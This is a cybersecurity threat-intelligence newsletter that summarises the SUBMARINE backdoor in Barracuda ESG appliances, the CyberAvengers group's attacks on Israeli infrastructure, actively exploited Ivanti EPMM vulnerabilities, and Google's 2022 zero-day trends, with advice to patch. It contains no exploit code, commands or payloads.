Malware Activity
CISA Discloses Details of Previously Unknown Backdoor "SUBMARINE" Impacting Recently Exploited Barracuda Appliance
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) released an alert on July 28, 2023, regarding three (3) new malware reports in association with the exploitation of CVE-2023-2868 affecting the Barracuda Email Security Gateway (ESG) Appliance. CVE-2023-2868 (which has a CVSS score of 9.8/10) is a remote-control injection vulnerability that was exploited in October 2022 as a zero-day flaw. The alert noted that the threat actor responsible exploited the vulnerability to "gain initial access to victim systems and then implanted backdoors to establish and maintain persistence." Previous to the alert, researchers have detailed that UNC4841, a suspected China-affiliated espionage actor, is believed to have exploited the Barracuda vulnerability in 2022. Three (3) malware variants were detailed in the alert, but one (1) backdoor, dubbed "SUBMARINE" (and otherwise known as "DEPTHCHARGE"), was previously unknown. CISA explained that SUBMARINE is a "novel persistent backdoor" that contains various artifacts, "including a SQL trigger, shell scripts, and a loaded library for a Linux daemon", that allow for execution with root privileges, command-and-control (C2), persistence, and cleanup. The agency also noted that the backdoor lives in a Structured Query Language (SQL) database on the ESG appliance and poses a severe threat for lateral movement. Additional details as well as indicators of compromise (IOCs) can be viewed in the alert linked below.
Threat Actor Activity
Threat Profile: CyberAvengers
Over the weekend, the reputable Israeli oil refinery BAZAN Group suffered an extensive distributed denial-of-service (DDoS) attack from a rather quiet threat organization who call themselves CyberAvengers (a.k.a CyberAv3ngers). These actors originally formed the group back in 2020 but have stayed under the radar over the past few years. The group appears to be primarily focused on exploiting critical infrastructure organizations throughout Israel, specifically electrical grids and service providers. One (1) such claimed attack from the CyberAvengers occurred against the Israeli power grid, where attackers destabilized power supply to key cities throughout the region including Herzliya, Tel Aviv, Netanya, Bat Yam, and others. These attacks were believed to be attributed to CyberAvengers after their social media accounts shared videos claiming responsibility for causing over 7,500 outages throughout these cities. CyberAvengers actors also had been suspected of compromising critical water assets in the region shortly after the power grid attacks, but no evidence pointed to the group aside from a unique timeline. Since these attacks, the group has remained passive until their recent DDoS attack on BAZAN Group. Researchers are unsure if the group will continue its attacks for the weeks to come or if they will take another hiatus. CTIX continues to monitor threat actor activity worldwide and will provide additional updates accordingly.
Vulnerabilities
Ivanti Patches Critical Vulnerabilities Under Active Attack
The U.S Cybersecurity and Infrastructure Security Agency (CISA) released an urgent alert after Ivanti disclosed two (2) critical vulnerabilities impacting their Endpoint Manager Mobile (EPMM) solution. These flaws are under active exploitation by threat actors attacking Norwegian government agencies. Ivanti's Endpoint Manager Mobile is a mobile management software engine that allows organization IT administrators to set policies for mobile devices, applications, and content. The first vulnerability, tracked as CVE-2023-35078, is a critical remote authentication bypass vulnerability, allowing unauthenticated remote attackers to add administrative EPMM accounts, pilfer personally identifiable information (PII), and change critical configuration settings after bypassing security to obtain access to the API. The second vulnerability, tracked as CVE-2023-35081, is a path traversal flaw that allows unauthenticated threat actors to perform arbitrary file writes to the EPMM server. CVE-2023-35081 can be chained to CVE-2023-35078, allowing the attacker to bypass authentication and then perform arbitrary file writes to the EPMM server. According to Ivanti, "Successful exploitation can be used to write malicious files to the appliance, ultimately allowing a malicious actor to execute OS commands on the appliance as the tomcat user." According to Shodan scans, more than 2,600 EPMM user portals are currently exposed to the public internet, with nineteen (19) of them linked to U.S. local and state government agencies. The technical details of the attack have not been made public yet, allowing as many organizations as possible to become compliant and protect themselves from exploitation. CTIX analysts urge all Ivanti EPMM administrators to ensure they are running the latest secure versions of the software solution to prevent future exploitation of these vulnerabilities.
- The Hacker News: Ivanti EPMM Vulnerabilities Article
- The Record: Ivanti EPMM Vulnerabilities Article
- Bleeping Computer: Ivanti EPMM Vulnerabilities Article
- Shodan: Scan of exposed US Entities
- CISA: Ivanti EPMM Vulnerabilities Urgent Warning
Honorable Mention
Google Vulnerability Report Sheds Light on Trends to Keep an Eye On
A recent vulnerability report by Google offered interesting statistics about in-the-wild exploitations from the last year, while also highlighting the long-standing problem was known zero-day flaws that don't have patches released in a timely manner. Overall, while 2022 saw a 40% drop in the number of discovered zero-days from 2021, it may not be as big of a win for improving security as it might first appear. The starkest development revealed from 2022 was the way zero-day vulnerabilities act as n-days for threat actors on Android. An n-day vulnerability refers to a software flaw that is known to the public for “n” days with or without a patch. The discrepancy for how the zero-days act is caused by a gap in the Android ecosystem between upstream vendors (Google) and downstream manufactures (phone manufacturers) where a vendor will fix a bug upon discovering a zero-day vulnerability, but it can take months for the downstream device manufacturers to implement the available patch in their own versions of Android. Hence, zero-day vulnerabilities that have been discovered can act as n-day vulnerabilities that are publicly known without having a patch, leaving vulnerabilities open to exploitation until the patch is finally rolled out by manufacturers. While upstream/downstream gaps exist, the trends were found to be more prevalent and longer lasting in Android. Other findings from the 2022 vulnerability report included a development in response to security improvements made by browser providers where threat actors are moving towards zero-click vulnerabilities that target device components and don't require victims to click on anything be compromised. While security experts said they knew of multiple attackers using zero-click exploits, there were no known in-the-wild zero-clicks publicly recorded in 2022. However, this may be due to the fact that they are very difficult to detect as compared to traditional device compromises. Additionally, around 40% of zero-day vulnerabilities that were discovered in-the-wild in 2022 were variants of previously reported vulnerabilities.
The semi-weekly Ankura Cyber Threat Investigations and Expert Services (CTIX) FLASH Update is designed to provide timely and relevant cyber intelligence pertaining to current or emerging cyber events. The preceding is a collection of cyber threat intelligence leads assembled over the past few days and typically includes high level intelligence pertaining to recent threat group/actor activity and newly identified vulnerabilities impacting a wide range of industries and victims. Please feel free to reach out to the Flash Team (flash@ankura.com) if additional context is needed.
© Copyright 2023. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.
